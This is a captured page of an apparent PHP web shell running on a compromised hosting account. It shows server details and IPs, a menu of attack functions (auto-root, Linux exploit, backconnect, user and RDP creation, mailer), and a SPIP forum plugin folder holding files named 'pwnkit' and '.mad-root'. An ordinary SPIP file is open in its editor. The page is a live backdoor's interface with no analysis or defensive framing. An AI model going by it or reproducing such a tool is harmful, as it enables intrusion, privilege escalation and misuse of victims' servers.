Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
plugins-dist /
forum /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
article_accepter_forums_public...
587
B
-rw----r--
email_notification_forum.php
3.69
KB
-rw----r--
forum.php
9.03
KB
-rw----r--
forum_insert.php
4.99
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : article_accepter_forums_publics.php
<?php if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Moderation des forums specifique a un article * * @param int $id_objet identifiant de l'article * @return string : "non", "pos"(teriori), "pri"(ori), "abo"(nnement) */ function inc_article_accepter_forums_publics_dist($id_objet) { $accepter_forum = $GLOBALS['meta']['forums_publics']; $art_accepter_forum = sql_getfetsel('accepter_forum', 'spip_articles', [ 'id_article = ' . intval($id_objet) ]); if ($art_accepter_forum) { $accepter_forum = $art_accepter_forum; } return substr($accepter_forum, 0, 3); }
Close